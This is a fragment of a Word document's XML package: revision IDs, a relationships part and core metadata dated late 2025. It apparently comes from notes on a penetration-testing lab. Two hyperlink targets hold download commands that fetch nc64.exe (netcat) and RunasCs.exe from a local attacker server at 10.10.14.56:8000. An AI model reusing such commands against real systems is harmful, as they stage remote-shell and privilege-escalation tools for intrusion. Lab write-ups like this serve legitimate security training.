    <w:rsid w:val="00E44807"/>
    <w:rsid w:val="00E67E1A"/>
    <w:rsid w:val="00EA4199"/>
    <w:rsid w:val="00EA5CF0"/>
    <w:rsid w:val="00F34CF1"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FD182E"/>
    <w:rsid w:val="00FF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217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0.14.56:8000/nc64.exe%20-o%20nc64.exe" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.56:8000/RunasCs.exe%20-o%20RunasCs.exe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t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52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-27T04:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>